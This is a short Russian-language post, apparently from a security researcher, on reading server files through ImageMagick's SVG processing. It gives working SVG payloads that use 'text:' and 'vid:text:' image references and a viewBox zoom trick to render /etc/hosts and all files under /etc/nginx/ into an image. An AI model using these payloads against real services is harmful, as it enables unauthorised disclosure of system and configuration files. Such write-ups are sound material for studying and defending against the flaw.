У меня тут открытие произошло как водится случайно. Крутил я читалку файлов через imagemagick со стандартным пейлоадом:
<svg xmlns="
http://www.w3.org/2000/svg" xmlns:xlink="
http://www.w3.org/1999/xlink">
<image xlink:href="text:/etc/hosts" height="1000" width="1000"/>
</svg>
Вроде читалка работала, но вот качество изображения было шакальное. Думал как можно это обойти и сделать так, чтобы не было ощущения что у тебя зрение -10. На помощь пришли атрибут viewBox, который позволил мне "зумить" квадратик указанного размера и распознавать содержимое файла.
Пейлоад принял такую форму:
<svg width="1000" height="1000" viewBox="0 0 150 150">
<image xlink:href="text:/etc/hosts" height="1000" width="1000"/>
</svg>
А теперь финт ушами ради которого вообще я решил написать пост.
Читаем статью
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/Меняем пейлоад с учётом свежеполученных знаний на такой:
<svg width="1000" height="1000" viewBox="0 0 1000 1000" >
<image xlink:href="vid:text:/etc/nginx/*" height="1000" width="1000"/>
</svg>
И получаем объединённую картинку со всеми файлами из директории /etc/nginx/